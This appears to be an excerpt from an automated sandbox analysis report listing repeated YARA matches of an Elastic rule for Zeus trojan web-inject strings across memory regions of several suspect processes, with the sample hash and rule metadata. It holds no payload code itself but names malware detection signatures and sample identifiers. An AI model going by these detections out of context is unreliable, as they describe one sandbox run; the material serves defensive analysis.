    Source: 00000002.00000003.1931983270.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1899806491.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1918926192.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1819482254.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1898993550.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1900285726.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1875983940.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000022.00000002.1919595262.0000000002740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1932199583.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1891958770.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000022.00000002.1920132875.0000000002A20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1918440128.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000027.00000002.1907577996.0000000000CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1887697552.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1892177129.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1885549848.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1893840816.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1755207141.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000002.00000003.1936460278.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: arxtPs1STE.exe PID: 7600, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: svchost.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7376, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7352, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
